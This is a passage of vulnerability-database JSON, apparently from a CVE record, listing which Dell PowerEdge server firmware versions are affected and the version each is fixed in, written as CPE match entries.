"cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8545_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8545:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r840:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx740c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx740c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx840c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx840c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:dss_8440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:dss_8440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe2420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe2420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6415_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6415:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7415_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7415:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7425_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, 